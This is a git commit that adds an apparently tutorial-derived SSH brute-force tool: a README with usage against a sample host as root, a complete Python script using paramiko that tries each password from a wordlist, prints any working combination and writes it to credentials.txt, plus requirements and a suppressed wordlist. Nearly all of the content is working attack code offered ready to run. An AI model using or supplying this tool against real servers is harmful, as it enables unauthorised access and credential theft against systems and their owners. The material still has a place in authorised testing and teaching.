greglebreton 2 years ago
commit 8a876f1473
  1. 26
      README.md
  2. 66
      bruteforce_ssh.py
  3. 2
      requirements.txt
  4. 4999
      wordlist.txt

@ -0,0 +1,26 @@
# [How to Brute-Force SSH Servers in Python](https://www.thepythoncode.com/article/brute-force-ssh-servers-using-paramiko-in-python)
To run this:
- `pip3 install -r requirements.txt`
-
```
python bruteforce_ssh.py --help
```
**Outputs:**
```
usage: bruteforce_ssh.py [-h] [-P PASSLIST] [-u USER] host
SSH Bruteforce Python script.
positional arguments:
host Hostname or IP Address of SSH Server to bruteforce.
optional arguments:
-h, --help show this help message and exit
-P PASSLIST, --passlist PASSLIST
File that contain password list in each line.
-u USER, --user USER Host username.
```
- If you want to bruteforce against the server `192.168.1.101` for example, the user `root` and a password list of `wordlist.txt`:
```
python bruteforce_ssh.py 192.168.1.101 -u root -P wordlist.txt
```

@ -0,0 +1,66 @@
import paramiko
import socket
import time
from colorama import init, Fore
# initialize colorama
init()
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
BLUE = Fore.BLUE
YELLOW = Fore.YELLOW
def is_ssh_open(hostname, username, password):
# initialize SSH client
client = paramiko.SSHClient()
# add to know hosts
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname=hostname, username=username, password=password, timeout=3,allow_agent=False,look_for_keys=False)
except socket.timeout:
# this is when host is unreachable
print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}")
returning = False
except paramiko.AuthenticationException:
print(f"{YELLOW}[!] Invalid credentials for {username}:{password}{RESET}")
returning = False
except paramiko.SSHException as err:
print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}")
print(f"{RED}{username}:{password}{RESET}")
print(f"{RED}{err}{RESET}")
# sleep for a minute
time.sleep(60)
#returning = is_ssh_open(hostname, username, password)
returning = False
else:
# connection was established successfully
print(f"{GREEN}[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}{RESET}")
returning = True
finally:
client.close()
return returning
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="SSH Bruteforce Python script.")
parser.add_argument("host", help="Hostname or IP Address of SSH Server to bruteforce.")
parser.add_argument("-P", "--passlist", help="File that contain password list in each line.")
parser.add_argument("-u", "--user", help="Host username.")
# parse passed arguments
args = parser.parse_args()
host = args.host
passlist = args.passlist
user = args.user
# read the file
passlist = open(passlist).read().splitlines()
# brute-force
for password in passlist:
if is_ssh_open(host, user, password):
# if combo is valid, save it to a file
open("credentials.txt", "w").write(f"{user}@{host}:{password}")
break

@ -0,0 +1,2 @@
colorama
paramiko

File diff suppressed because it is too large Load Diff
Loading…
Cancel
Save